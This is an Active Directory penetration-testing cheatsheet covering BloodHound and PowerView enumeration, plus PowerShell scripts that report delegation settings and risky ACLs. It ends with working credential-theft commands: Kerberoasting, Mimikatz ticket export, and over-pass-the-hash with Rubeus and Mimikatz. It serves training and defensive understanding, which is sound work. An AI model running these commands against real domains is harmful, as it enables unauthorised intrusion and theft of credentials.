Active Directory (AD) Cheatsheet

This post assumes that opsec is not a concern and that you can be as noisy as the enumeration and lateral movement require. It is meant for pentesters and defenders alike, for the same reason: to understand the AD environment better.

This cheatsheet should help with certifications such as CRTP, OSCP and PNPT.

Note: only the most commonly used flags and switches are listed. The best documentation is the code itself.

This is a living document. Last updated: 19 / June / 2022

Enumeration

Initial and lateral movement enumeration

Get the Dog Out - SharpHound + BloodHound

Let's have the dog sniff things out, because automated enumeration is cool.

The tools used are the BloodHound GUI and the SharpHound collector (SharpHound.exe or SharpHound.ps1). Use a collector release that matches your BloodHound version, otherwise the import will fail or silently miss data.

Use LDAPS (TCP 636) instead of plain LDAP

./SharpHound.exe --SecureLdap

Getting all the data

./SharpHound.exe --CollectionMethod All

It's best to pull session info separately.
Looping the collection (default duration 2 hours) makes sense for sessions, since they change over time and a single snapshot misses most of them.

./SharpHound.exe --CollectionMethod Session [--Loop] [--LoopDuration <HH:MM:SS>] [--LoopInterval <HH:MM:SS>]

Run the LDAP collection as a different user (LDAP only: SMB/RPC-based collection such as sessions and local groups still runs as the current process user)

./SharpHound.exe --CollectionMethod All --LdapUsername <user_name> --LdapPassword <pass>

Specify domain

./SharpHound.exe -d this.domain.local --CollectionMethod All

Next, import the resulting zip into the BloodHound GUI and start querying for paths :)

Getting Hands Dirty - PowerView

Let’s have some fun ourselves with manual enumeration.

We will use PowerView and some net commands to perform enumeration manually.

Assuming the dev-branch PowerView.ps1 has been loaded in memory. The commands below mix the newer names (Get-Domain, Get-Forest, ...) with the older Get-Net* names; the dev branch keeps the old names as aliases, so both work there.

Domain Enumeration

Get basic information of the domain

Get-Domain

Get domain SID

Get-DomainSID

Get domain policies

Get-DomainPolicy [-Domain <target>]

Get domain Kerberos policy

(Get-DomainPolicy).KerberosPolicy

Get list of DCs

Get-DomainController [-Domain <target>]

Get DC IP

nslookup <target_dc>

Forest Enumeration

Get current forest

Get-Forest

Get a list of domains

Get-ForestDomain [-Forest <target>]

User Enumeration

Get a list of users

Get-NetUser [-Domain <target>] [user_name]
net user /domain

Get a count of users

(Get-NetUser).count

Get a list of users with only specific properties

Get-NetUser [-Properties <prop1,prop2,...>]

Get users with their logon counts and bad password counts, keeping only those with bad password attempts greater than 0 (a quick indicator of spraying or lockout trouble)

Get-NetUser | select cn, logoncount, badpwdcount | ? {$_.badpwdcount -gt 0}

Finding users with SPN

Get-NetUser -SPN

Finding users configured for constrained delegation (msDS-AllowedToDelegateTo is set)

Get-NetUser -TrustedToAuth

Finding users that are NOT marked "Account is sensitive and cannot be delegated", i.e. whose identity can be delegated

Get-NetUser -AllowDelegation

Computer Enumeration

Get a list of computers

Get-NetComputer [-Domain <target>] [-OperatingSystem "*2016*"] [-Properties <prop1,prop2,...>]

Get a list of computers with Unconstrained delegation

Get-NetComputer -Unconstrained

Finding computers configured for constrained delegation (msDS-AllowedToDelegateTo is set)

Get-NetComputer -TrustedToAuth
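The PowerView switches above are just LDAP filters. The block below is an added example (not from the original post or from PowerView) that issues the same filters through the built-in [adsisearcher], so it works on a domain-joined box without loading PowerView. It also adds the defender's view of -AllowDelegation: privileged accounts that could still be delegated. Function and variable names (Search-Ad, Get-DelegationReport) are my own; the userAccountControl bit values and the bitwise-AND matching rule OID are from the AD documentation.

```powershell
# Added example, not from the original post: the LDAP filters behind PowerView's
# -SPN, -TrustedToAuth, -AllowDelegation and -Unconstrained switches, via [adsisearcher].
$BIT_AND = '1.2.840.113556.1.4.803'        # LDAP bitwise-AND matching rule
$UAC_DISABLED      = 0x2
$UAC_UNCONSTRAINED = 0x80000               # TRUSTED_FOR_DELEGATION
$UAC_NOT_DELEGATED = 0x100000              # "Account is sensitive and cannot be delegated"
$UAC_PROTO_TRANS   = 0x1000000             # TRUSTED_TO_AUTH_FOR_DELEGATION (constrained + protocol transition)
$USER     = '(samAccountType=805306368)'
$COMPUTER = '(samAccountType=805306369)'
$ENABLED  = "(!(userAccountControl:${BIT_AND}:=${UAC_DISABLED}))"

function Search-Ad {
    param([Parameter(Mandatory)][string]$Filter, [string[]]$Properties = @('samAccountName'), [string]$Domain)
    # Serverless bind to the current domain, or to another domain by DNS name (needs a trust)
    $root = if ($Domain) { [adsi]"LDAP://$Domain" } else { [adsi]'' }
    $s = New-Object System.DirectoryServices.DirectorySearcher($root, $Filter)
    $s.PageSize = 1000                       # without paging the DC caps results at MaxPageSize (1000)
    $null = $s.PropertiesToLoad.AddRange($Properties)
    foreach ($r in $s.FindAll()) {
        $o = [ordered]@{}
        # result property names come back lowercase; multi-valued attributes are joined into one string
        foreach ($p in $Properties) { $o[$p] = @($r.Properties[$p.ToLower()]) -join ';' }
        [pscustomobject]$o
    }
}

function Get-DelegationReport {
    param([string]$Domain)
    $props = 'samAccountName', 'servicePrincipalName', 'msDS-AllowedToDelegateTo', 'userAccountControl'
    [pscustomobject]@{
        # Get-NetUser -SPN : Kerberoast candidates (krbtgt always has an SPN and is not worth cracking)
        SpnUsers = Search-Ad "(&${USER}${ENABLED}(servicePrincipalName=*)(!(samAccountName=krbtgt)))" $props $Domain
        # Get-NetComputer -Unconstrained : TRUSTED_FOR_DELEGATION; domain controllers appear here by design
        UnconstrainedComputers = Search-Ad "(&${COMPUTER}(userAccountControl:${BIT_AND}:=${UAC_UNCONSTRAINED}))" $props $Domain
        # Get-NetUser / Get-NetComputer -TrustedToAuth : constrained delegation on any account type.
        # ProtocolTransition = $true means S4U2Self is allowed, so the account can impersonate users without their ticket.
        Constrained = Search-Ad "(&${ENABLED}(msDS-AllowedToDelegateTo=*))" $props $Domain | ForEach-Object {
            $_ | Add-Member -NotePropertyName ProtocolTransition -NotePropertyValue (([int]$_.userAccountControl -band $UAC_PROTO_TRANS) -ne 0) -PassThru
        }
        # Get-NetUser -AllowDelegation, inverted for defenders: privileged accounts (adminCount=1 is set by SDProp on
        # protected-group members) that lack NOT_DELEGATED, so their TGT can be captured via delegation abuse.
        # Membership in Protected Users also blocks delegation; check that group separately.
        PrivilegedDelegatable = Search-Ad "(&${USER}${ENABLED}(adminCount=1)(!(userAccountControl:${BIT_AND}:=${UAC_NOT_DELEGATED})))" ('samAccountName', 'memberOf') $Domain
    }
}

$report = Get-DelegationReport
$report.UnconstrainedComputers | Format-Table samAccountName
$report.Constrained            | Format-Table samAccountName, msDS-AllowedToDelegateTo, ProtocolTransition
$report.PrivilegedDelegatable  | Format-Table samAccountName
```

Any authenticated domain user can run these queries; nothing here needs elevated rights. Pass -Domain to Get-DelegationReport to query a trusted domain, which is the same thing the -Domain switch does in PowerView.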

Group Enumeration

Get a list of groups in a domain (with Get-NetGroup, -UserName lists the groups a given user belongs to)

net group /domain
Get-NetGroup [-Domain <target>] [-FullData] [-GroupName "*admin*"] [-UserName 'user_name']

Get group membership

Get-NetGroupMember [-GroupName 'group_name'] [-Recurse]

Share Enumeration

List shares the current user has access to

Invoke-ShareFinder -CheckShareAccess -ErrorAction SilentlyContinue [-ComputerDomain <target_domain>]

ACL Enumeration

Get resolved ACEs, optionally for a specific user/group and domain

Get-ObjectAcl [-Identity <user_name>] [-Domain <target_domain>] -ResolveGUIDs

Get interesting resolved ACLs

Invoke-ACLScanner [-Domain <target_domain>] -ResolveGUIDS

Get interesting resolved ACLs where the trustee (the principal holding the right) matches a given name (ex. noobsec)

Invoke-ACLScanner -ResolveGUIDS | ?{$_.IdentityReference -match 'noobsec'}
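To make it clear what "interesting" and "-ResolveGUIDs" mean, here is an added example (my code, not PowerView's) that does the same scan with [adsisearcher]: pull each object's DACL, keep the rights that let a principal take over the object, drop the default high-privilege principals by RID, and resolve the GUIDs in object-specific ACEs against the Extended-Rights and Schema containers. The function names and the -IdentityMatch parameter are my own; it assumes a domain-joined host with normal user rights.

```powershell
# Added example, not from the original post: an [adsisearcher] version of
# Invoke-ACLScanner -ResolveGUIDs.
function Get-AdGuidMap {
    # rightsGuid (CN=Extended-Rights) and schemaIDGUID (CN=Schema) -> name; this is the lookup -ResolveGUIDs does
    $cfg = [string]([adsi]'LDAP://RootDSE').Properties['configurationNamingContext'].Value
    $map = @{}
    $s = New-Object System.DirectoryServices.DirectorySearcher([adsi]"LDAP://CN=Extended-Rights,$cfg", '(rightsGuid=*)')
    $s.PageSize = 1000
    foreach ($r in $s.FindAll()) { $map[[guid][string]$r.Properties['rightsguid'][0]] = [string]$r.Properties['displayname'][0] }
    $s = New-Object System.DirectoryServices.DirectorySearcher([adsi]"LDAP://CN=Schema,$cfg", '(schemaIDGUID=*)')
    $s.PageSize = 1000
    foreach ($r in $s.FindAll()) {
        $bytes = [byte[]]$r.Properties['schemaidguid'][0]          # stored as a binary GUID
        $map[(New-Object guid -ArgumentList @(,$bytes))] = [string]$r.Properties['ldapdisplayname'][0]
    }
    $map
}

function Find-InterestingAce {
    param(
        # Object types to scan; widen or narrow as needed
        [string]$Filter = '(|(objectCategory=person)(objectCategory=group)(objectCategory=computer)(objectCategory=organizationalUnit)(objectCategory=groupPolicyContainer)(objectCategory=domainDNS))',
        [string]$IdentityMatch = '.*'    # regex on the resolved trustee, e.g. 'noobsec'
    )
    $guidMap  = Get-AdGuidMap
    $searcher = [adsisearcher]$Filter
    $searcher.PageSize = 1000
    $searcher.SecurityMasks = [System.DirectoryServices.SecurityMasks]'Dacl,Owner'   # ask the DC for the DACL
    $null = $searcher.PropertiesToLoad.AddRange([string[]]('distinguishedname', 'ntsecuritydescriptor'))
    # Rights that allow taking over an object (or one of its attributes) rather than merely reading it
    $takeover = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|ExtendedRight|Self'
    foreach ($r in $searcher.FindAll()) {
        $sd = New-Object System.DirectoryServices.ActiveDirectorySecurity
        $sd.SetSecurityDescriptorBinaryForm([byte[]]$r.Properties['ntsecuritydescriptor'][0])
        foreach ($ace in $sd.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($ace.ActiveDirectoryRights.ToString() -notmatch $takeover) { continue }
            # RID < 1000 = built-in/default principals (Domain Admins, SYSTEM, ...) that are expected to hold these rights.
            # This also drops Everyone (S-1-1-0) and Authenticated Users (S-1-5-11); review those separately.
            if ([int]($ace.IdentityReference.Value.Split('-')[-1]) -lt 1000) { continue }
            try   { $who = $ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $who = $ace.IdentityReference.Value }                  # orphaned SID, keep it raw
            if ($who -notmatch $IdentityMatch) { continue }
            $objType = if ($ace.ObjectType -eq [guid]::Empty) { 'All' }
                       elseif ($guidMap.ContainsKey($ace.ObjectType)) { $guidMap[$ace.ObjectType] }
                       else { $ace.ObjectType.ToString() }
            [pscustomobject]@{
                ObjectDN              = [string]$r.Properties['distinguishedname'][0]
                IdentityReference     = $who
                ActiveDirectoryRights = $ace.ActiveDirectoryRights
                ObjectAceType         = $objType       # e.g. User-Force-Change-Password, member, msDS-KeyCredentialLink
                IsInherited           = $ace.IsInherited
            }
        }
    }
}

Find-InterestingAce -IdentityMatch 'noobsec' | Format-Table -AutoSize
```

The resolved ObjectAceType is what turns a generic "WriteProperty" or "ExtendedRight" into something actionable: WriteProperty on member means group membership control, ExtendedRight User-Force-Change-Password means a password reset, and so on. Run it without -IdentityMatch to see every non-default principal holding such rights.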

Session Enumeration

Finding sessions on a computer (NetSessionEnum; on Windows 10 1709 / Server 2019 and later this needs local admin on the target)

Get-NetSession [-Computer <comp_name>]

Get who is logged on to a computer (reads HKU remotely via the registry, so it needs remote registry access)

Get-LoggedOnLocal [-ComputerName <comp_name>]

User Hunting

Get list of machines where current user has local admin access

Find-LocalAdminAccess [-Domain <target_domain>]

Find machines where members of specific groups have sessions. Default: Domain Admins

Invoke-UserHunter [-GroupName <group_name>]

Same as above, but -CheckAccess additionally tests whether the current user has local admin on each machine found

Invoke-UserHunter -CheckAccess

Lateral Movement

Kerberoasting

To see existing tickets

klist

Remove all tickets

klist purge

PowerView

Request a Kerberos service ticket for the specified SPN and print the crackable part.
Output is in Hashcat format by default; the other option is John. Accounts with AES enabled return AES (etype 17/18) tickets, which crack far slower than RC4 (etype 23).

Request-SPNTicket -SPN "CIFS/target.domain.local" [-OutputFormat John]

Manually

Doing it manually only requests the ticket into the current logon session; it then has to be exported from memory before the hash can be cracked.

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "CIFS/target.domain.local"

Dump the tickets out

Invoke-Mimikatz -Command '"kerberos::list /export"'

Now, crack 'em (hashcat mode 13100 for RC4 tickets, 19600 / 19700 for AES128 / AES256).

Over-Pass the Hash

Rubeus (the /opsec switch only works with /aes256; requesting an RC4-based TGT for an AES-capable account stands out in 4768 events with Ticket Encryption Type 0x17)

Rubeus.exe asktgt /user:USER </rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/opsec] /ptt

Mimikatz

sekurlsa::pth /user:Administrator /domain:target.domain.local </ntlm:hash | /aes256:hash> /run:powershell.exe

Unlike Rubeus asktgt, sekurlsa::pth patches LSASS and therefore needs local admin on the box; the spawned process then authenticates over the network with the injected key material.